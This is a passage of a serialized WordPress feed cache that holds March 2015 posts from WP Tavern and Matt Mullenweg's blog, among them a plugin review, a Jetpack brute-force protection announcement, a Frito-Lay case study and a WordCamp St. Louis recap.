subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #184:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 05:38:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Prada Revolutionaries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44770\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/03/prada-revolutionaries/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:656:\"<blockquote><p>“For every McDonald’s you blow up, ‘they’ will build two. Instead of slapping a wad of Semtex between the Happy Meals and the plastic tray, work your way up through the ranks, take over the board of Directors and turn the company into an international laughing stock.”</p>\n<p>Sounds nice in theory. But I knew corporations were more resilient than that. Sabotaging the system from inside was as much a pipe dream as changing it through politics and protest.</p></blockquote>\n<p>From <a href=\"http://technoccult.net/archives/2013/11/18/prada-revolutionaries/\">Prada Revolutionaries: Confessions of a Recovering Solutionist</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Mar 2015 02:48:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WPTavern: How to Add a Featured Image Column to The Post Listing Page in The WordPress Backend\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40857\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"http://wptavern.com/how-to-add-a-featured-image-column-to-the-post-listing-page-in-the-wordpress-backend\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2800:\"<p>Featured images usually serve as the main image for a post or page. However, one of the problems with featured images is that you can’t see which posts they’re assigned to unless you edit an individual post or page.</p>\n<p><a title=\"https://wordpress.org/plugins/post-list-featured-image/\" href=\"https://wordpress.org/plugins/post-list-featured-image/\">Post List Featured Image,</a> developed by <a title=\"http://jaggededgemedia.com/\" href=\"http://jaggededgemedia.com/\">Jagged Edge Media</a>, solves this problem by adding a featured image column to the post listing in the backend of WordPress.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostColumn.png\" rel=\"prettyphoto[40857]\"><img class=\"size-full wp-image-40859\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostColumn.png?resize=1025%2C417\" alt=\"Featured Image Column\" /></a>Featured Image Column\n<p>The plugin also comes with a set of filters that allow you to sort through posts with and without a featured image.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostFiltering.png\" rel=\"prettyphoto[40857]\"><img class=\"size-full wp-image-40860\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostFiltering.png?resize=396%2C108\" alt=\"Featured Image Filtering Options\" /></a>Featured Image Filtering Options\n<p>Unlike some of the other plugins I tested, this one has three different thumbnail sizes to choose from, 50×50, 100×100, and 150×150. I recommend using the largest size since it’s hard to make out details in smaller images.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostColumnSettings.png\" rel=\"prettyphoto[40857]\"><img class=\"size-full wp-image-40861\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/FeaturedImagePostColumnSettings.png?resize=697%2C453\" alt=\"Post List Featured Image Settings\" /></a>Post List Featured Image Settings\n<p>Although 150×150 is a decent size, I’d like to be able to click on an image and see the full size in a model window. This would make it convenient to see the full size instead of having to right-click and select view image.</p>\n<p>Out of the box, the image size is the only thing to configure. Post List Featured Image works without any issues on WordPress 4.1 and is <a title=\"https://wordpress.org/plugins/post-list-featured-image/\" href=\"https://wordpress.org/plugins/post-list-featured-image/\">available for free</a> on the WordPress plugin directory. If you’re looking for more features, there’s a <a title=\"http://jaggededgemedia.com/pro-plugins-shop/\" href=\"http://jaggededgemedia.com/pro-plugins-shop/\">pro version</a> available as well.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Mar 2015 21:28:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: Jetpack 3.4 Adds Protection Against Brute Force Attacks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40830\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/jetpack-3-4-adds-protection-against-brute-force-attacks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2470:\"<p>Last August, <a href=\"http://wptavern.com/automattic-acquires-parka-llc-the-creators-of-bruteprotect\" target=\"_blank\">Automattic acquired Parka, LLC</a>, the makers of the <a href=\"https://bruteprotect.com/\" target=\"_blank\">BruteProtect</a> security tool for WordPress, with the goal of integrating its features into Jetpack. The services provided in BruteProtect Pro were subsequently offered for free.</p>\n<p><a href=\"http://jetpack.me/2015/03/17/jetpack-3-4-protect-secure-and-simplify/\" target=\"_blank\">Jetpack 3.4</a> was released today with brute force protection available to users via a new module called Protect. You can find it under the Jetpack settings page or within your centralized dashboard on WordPress.com.</p>\n<p>Enabling protection against botnet attacks is as simple as checking a box:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/security.png\" rel=\"prettyphoto[40830]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/security.png?resize=666%2C590\" alt=\"security\" class=\"aligncenter size-full wp-image-40834\" /></a></p>\n<p>The new module protects your login form from brute force attempts and allows you to scan your site for malicious code in Jetpack. It also allows you to manage a whitelist of IP addresses if you ever need to prevent Jetpack from blocking one.</p>\n<p>At the bottom of your Jetpack stats summary, where you find the number of spam comments blocked by Akismet, you’ll also now see the number of blocked malicious login attempts.</p>\n<p>As of February 2015, the BruteProtect plugin has defended over 225,000 sites from more than 350 million botnet attacks. The plan is to phase out the independent plugin by the end of 2015 in favor of maintaining its features via Jetpack.</p>\n<p>Jetpack Protect is a truly compelling new addition to the plugin. Its inclusion means that millions of WordPress sites will now have free access to protection against brute force attacks, making a large portion of the web more secure.</p>\n<p>With the addition of Protect, the plugin has grown to include 36 modules, which can be a bit overwhelming for new users. Jetpack 3.4 introduces a new “Jump Start” feature that will activate a curated set of modules to get you started. This release also includes a list of 43 enhancements and 11 bug fixes, which you can view on the plugin’s <a href=\"https://wordpress.org/plugins/jetpack/changelog/\" target=\"_blank\">changelog</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Mar 2015 17:23:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"WPTavern: Frito-Lay’s Custom Project Management App Is Built on WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40423\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/frito-lays-custom-project-management-app-is-built-on-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6597:\"<p>Every year <a href=\"http://www.fritolay.com/\" target=\"_blank\">Frito-Lay</a> pulls in billions of dollars from sales of its flagship assortment of potato chips, including Fritos, Cheetos, Doritos, Tostitos, and Ruffles. Behind all of these crunchy snacks is a busy hive of designers and project managers who require a robust system for working together on creative projects.</p>\n<p>Last year, Frito-Lay approached <a href=\"http://liftux.com/\" target=\"_blank\">Lift</a>, a WordPress design and development agency, to create a custom project management/proofing app for its creative team. Lift opted to <a href=\"http://liftux.com/portfolio/frito-lay-creative-project-management-app/\" target=\"_blank\">build the app using WordPress as a base</a>. The result is a completely customized admin experience tailored to fit Frito-Lay’s workflow like a glove.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/frito-lay-showcase.jpg\" rel=\"prettyphoto[40423]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/frito-lay-showcase.jpg?resize=1025%2C918\" alt=\"frito-lay-showcase\" class=\"aligncenter size-full wp-image-40787\" /></a></p>\n<h3>Under the Hood of the App</h3>\n<p>The project management app melds a collection of plugins with an accompanying theme to deliver the necessary user roles, custom fields, notifications/updates, and upload management.</p>\n<p>“We created a custom theme that includes modifications to the WordPress admin and force redirects users to sign in if they attempt to visit a page that typically would appear on the front-end,” Lift Partner <a href=\"https://twitter.com/chriswallace\" target=\"_blank\">Chris Wallace</a> said. His team used a number of plugins to customize the admin, including:</p>\n<ul>\n<li><a href=\"https://wordpress.org/plugins/advanced-custom-fields/\" target=\"_blank\">Advanced Custom Fields</a> by Elliot Condon</li>\n<li><a href=\"https://wordpress.org/plugins/members/\" target=\"_blank\">Members</a> by Justin Tadlock</li>\n<li><a href=\"https://wordpress.org/plugins/stream/\" target=\"_blank\">Stream</a> (the pre-cloud based version) by X-Team</li>\n<li><a href=\"https://wordpress.org/plugins/amazon-s3-and-cloudfront/\" target=\"_blank\">Amazon S3 and Cloudfront</a> by Brad Touesnard</li>\n</ul>\n<p>Lift implemented the custom admin design as part of the theme. They built it in such a way that the client will be able to keep pace with WordPress core and plugin updates without breaking the app.</p>\n<p>“We tried to keep major UI changes to a minimum and focus on building the UI with Advanced Custom Fields wherever we needed that level of customization,” Wallace said.</p>\n<p>“There are a few custom UI elements but they are styled and managed through our custom theme, so updated plugins and WordPress Core shouldn’t ever really break those things as long as major actions and filters remain in place.”</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/frito-lay-ui-elements.png\" rel=\"prettyphoto[40423]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/frito-lay-ui-elements.png?resize=1020%2C495\" alt=\"frito-lay-ui-elements\" class=\"aligncenter size-full wp-image-40807\" /></a></p>\n<p>Lift customized the project workflow for Frito-Lay using new workflows based on post statuses, modeled after the way <a href=\"https://wordpress.org/plugins/edit-flow/\" target=\"_blank\">Edit Flow</a> manages the editorial process.</p>\n<p>“When projects are updated, we check for a certain status and send out update emails to whoever needs to be notified for certain stages of the project,” Wallace said. “Additionally, we swapped the ‘publish’ metabox out for a custom one based on our status updates, allowing us to easily show the state of the project and change the UI as necessary.”</p>\n<h3>Why Use WordPress Instead of Basecamp?</h3>\n<p>You might be wondering why Frito-Lay would opt to build its own project management app when something like Basecamp already exists with similar features.</p>\n<p>Basecamp’s top pricing tier is $3K per year and has a maximum storage limit of 500GB. That limit could be used up fairly quickly while managing design projects, which often require passing large files back and forth between team members.</p>\n<p>Instead, Frito-Lay stores all of its data on Amazon, which allows the team to organize files exactly how it needs them. Building a custom project management app preserves the team’s established workflow. They never have to worry about running out of space and can always modify the app’s behavior if necessary in the future.</p>\n<p>Wallace said that it’s not uncommon for Lift to receive requests from companies that prefer to build their own custom software, instead of going with a SaaS provider. In many cases, building a custom solution is more cost effective for the client in the long run.</p>\n<p>“Most of the projects we’ve done recently have been for television networks and news organizations but we do receive frequent requests to modify workflows in the WordPress admin,” he said. “I would say most of our work involves theme design but there are definitely clients who need plugins that add or modify the admin one way or another.”</p>\n<p>Although WordPress proved to be a strong option for Frito-Lay, Wallace and the Lift team don’t always pitch the platform for their projects.</p>\n<p>“It just so happens that it is a good fit for many of the projects we are presented with,” he said. “I think for most website projects nowadays, clients just need something familiar, fast, and easy to use and WordPress typically fits in with that.”</p>\n<p>Lift is currently building more projects with AngularJS using the WordPress REST API to create more customized app-like solutions.</p>\n<p>“I think the ability to create WordPress-powered apps in Javascript is a big step forward for WordPress,” Wallace said. “It allows you to create and manage a number of apps that can interact with a single WordPress site.”</p>\n<p>Building custom apps for clients doesn’t always mean starting from scratch. “I think we’ve gotten to the point where WordPress has proven to be highly stable, scalable, fast, and easy-to-use,” he said.</p>\n<p>“If you need advice, there are a bunch of local meetups and online groups dedicated to WP, an advantage which is lacking in some of the smaller CMS tools out there. Community is everything.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Mar 2015 16:27:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Matt: Chosen as Young Global Leader\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44864\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://ma.tt/2015/03/chosen-as-young-global-leader/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:457:\"<p>I’m very honored to be chosen as part of the<br />\nWorld Economic Forum’s <a href=\"http://widgets.weforum.org/ygl-2015/04.html\">Young Global Leaders class of 2015</a> alongside some really amazing folks. I spoke at Davos a few years ago and it was a very interesting experience — I think they snuck me in on a media badge, which is <a href=\"http://ma.tt/2013/02/fifth-estate/\">why I wrote a post about the fifth estate for them</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Mar 2015 15:10:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WPTavern: Recap of WordCamp St. Louis, MO, 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40776\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wptavern.com/recap-of-wordcamp-st-louis-mo-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8306:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/WordCampStLouis2015FeaturedImage.png\" rel=\"prettyphoto[40776]\"><img class=\"aligncenter size-full wp-image-39884\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/WordCampStLouis2015FeaturedImage.png?resize=754%2C218\" alt=\"WordCamp St Louis 2015 Featured Image\" /></a>This past weekend, more than 300 people attended <a title=\"http://stlouis.wordcamp.org/2015/\" href=\"http://stlouis.wordcamp.org/2015/\">WordCamp St. Louis, MO, 2015</a> on the campus of <a title=\"http://wustl.edu/\" href=\"http://wustl.edu/\">Washington University</a>. For more than half of the attendees, this was their first WordCamp. With <a title=\"http://stlouis.wordcamp.org/2015/schedule/\" href=\"http://stlouis.wordcamp.org/2015/schedule/\">four tracks</a> going on at the same time, attendees had plenty of opportunities to learn.</p>\n<h2>Great WiFi</h2>\n<p>As to be expected, WiFi coverage was great throughout the event. I didn’t hear anyone complain about connection problems or speed. In my experience, WordCamps held on college campuses usually have great speed and are built to handle a large number of concurrent connections. WordCamp St. Louis was no exception.</p>\n<h2>Crowded Classrooms</h2>\n<p>Outside of a few sessions and keynotes in the main auditorium, sessions were held in classrooms that can fit 20-30 people comfortably. Some sessions were more popular than others where there was standing and sitting room only. Not only did some attendees have to sit on the floor or stand up during the session, it caused the room’s temperature to significantly increase.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/WCStLouisWPSecuritySession.jpg\" rel=\"prettyphoto[40776]\"><img class=\"size-full wp-image-40777\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/WCStLouisWPSecuritySession.jpg?resize=1024%2C768\" alt=\"Standing and Sitting Room Only to Learn WP Security\" /></a>Standing and Sitting Room Only to Learn WP Security\n<p>It’s hard to predict how popular a given session is going to be without some sort of survey before hand. I hope the organizing team sends out a post event survey to find out which sessions were the most popular so they can assign them to larger rooms next year.</p>\n<h2>My Favorite Session</h2>\n<p>My favorite session was by <a title=\"http://sara-cannon.com/\" href=\"http://sara-cannon.com/\">Sara Cannon</a> on the <a title=\"stlouis.wordcamp.org/2015/session/wordpress-and-user-experience/\" href=\"http://wptavern.com/stlouis.wordcamp.org/2015/session/wordpress-and-user-experience/\">WordPress User Experience</a> and how it can be improved. She shared a number of plugins to improve the user experience for publishers, site owners, and content creators.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/SaraCannonWCStLouis.jpg\" rel=\"prettyphoto[40776]\"><img class=\"size-full wp-image-40780\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/SaraCannonWCStLouis.jpg?resize=1024%2C768\" alt=\"Sara Cannon at WordCamp St. Louis\" /></a>Sara Cannon at WordCamp St. Louis\n<p>Some of the plugins mentioned include <a title=\"https://wordpress.org/plugins/simple-page-ordering/\" href=\"https://wordpress.org/plugins/simple-page-ordering/\">Simple Page Ordering</a>, <a title=\"https://wordpress.org/plugins/featured-image-column/\" href=\"https://wordpress.org/plugins/featured-image-column/\">Featured Image Column</a>, and <a title=\"https://wordpress.org/plugins/drag-drop-featured-image/\" href=\"https://wordpress.org/plugins/drag-drop-featured-image/\">Drag and Drop Featured Image</a>. Here <a title=\"http://www.slideshare.net/saracannon/wordpress-user-experience-wordcamp-st-louis\" href=\"http://www.slideshare.net/saracannon/wordpress-user-experience-wordcamp-st-louis\">are the slides</a> from her presentation and expect reviews of these plugins in future posts on the Tavern.</p>\n<h2>KidsCamp</h2>\n<p>KidsCamp featured children between the ages of 9-13 years old learning WordPress inside and out. Russell Fair, Chris Koerner, Lucas Lima, and Eric Juden taught them the following:</p>\n<ul>\n<li>What is WordPress?</li>\n<li>How is it being used?</li>\n<li>Let’s create our blog! (using a free account on wordpress.com)</li>\n<li>How to add new posts and pages</li>\n<li>How to add multimedia (photos, video)</li>\n<li>Talk about privacy and security</li>\n<li>Copyright and fair use</li>\n<li>Free and open source software (like WordPress!)</li>\n<li>Talk about the public nature of the web.</li>\n</ul>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/KidsCampStLouis.jpg\" rel=\"prettyphoto[40776]\"><img class=\"size-full wp-image-40781\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/KidsCampStLouis.jpg?resize=1024%2C768\" alt=\"KidsCamp St. Louis 2015\" /></a>KidsCamp St. Louis 2015\n<p>Based on my observations, the children did well. One child in particular noticed that the admin bar looked similar to the top navigation bar provided by the theme and asked how to remove it. There were few questions asked as the children picked up on WordPress rather quickly.</p>\n<p>To my surprise, KidsCamp touched on copyright law and explained the public nature of the web. I didn’t interview any of the children to find out what they thought about the class, but I’m happy to see these subjects taught at an early age. I hope other WordCamps adopt a similar strategy.</p>\n<p>I spoke to a woman who was with her husband and son who has a business built on WordPress. Not only was she thrilled with KidsCamp, but she loved that there was time to learn WordPress as a family.</p>\n<h2>Contributor Day</h2>\n<p>On the second day of WordCamp, one of the day long sessions focused on <a title=\"http://stlouis.wordcamp.org/2015/session/give-back-to-core-2/\" href=\"http://stlouis.wordcamp.org/2015/session/give-back-to-core-2/\">contributing back to WordPress</a>. There were sessions on <a href=\"https://make.wordpress.org/docs/\">updating documentation</a>, <a href=\"https://make.wordpress.org/themes/\">helping the theme review team</a>, <a href=\"https://make.wordpress.org/support/\">answering questions</a>, <a href=\"https://make.wordpress.org/design/\">providing new designs</a>, <a href=\"https://make.wordpress.org/community/\">hosting a local WordPress-related event</a>, and <a href=\"https://make.wordpress.org/core/\">contributing code to WordPress</a>.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/KonstantinObenlandWCStLouis2015.jpg\" rel=\"prettyphoto[40776]\"><img class=\"size-full wp-image-40782\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/KonstantinObenlandWCStLouis2015.jpg?resize=1024%2C768\" alt=\"Q&A With Konstantin Obenland\" /></a>Q&A With Konstantin Obenland\n<p><a title=\"https://twitter.com/obenland\" href=\"https://twitter.com/obenland\">Konstantin Obenland</a> did a 45 minute session where anyone in the room could ask him a question on topics related to WordPress core. <a title=\"https://pippinsplugins.com/\" href=\"https://pippinsplugins.com/\">Pippin Williamson</a> gave a demonstration on <a title=\"http://wptavern.com/how-to-adopt-a-plugin-or-put-it-up-for-adoption\" href=\"http://wptavern.com/how-to-adopt-a-plugin-or-put-it-up-for-adoption\">how to put a plugin up for adoption</a> and showed the audience how he reviews plugins before they’re approved to be on the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">official plugin directory</a>.</p>\n<h2>Incredible Value</h2>\n<p>Overall, WordCamp St. Louis was a great event. There were plenty of volunteers to help guide people around, something that is a necessity when multiple tracks, floors, and classrooms are involved. The catered food was excellent and the after party held at <a title=\"http://www.citymuseum.org/\" href=\"http://www.citymuseum.org/\">City Museum</a> was a blast. One person I talked to described WordCamp St. Louis as an incredible value and several other first-time WordCamper’s shared the same sentiment.</p>\n<p>The organizers did a great job putting this event together. However, if WordCamp St. Louis wants to cater to a larger audience next year, it’s going to have to find a venue with rooms that hold 30-50 people comfortably.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 18 Mar 2015 06:44:55 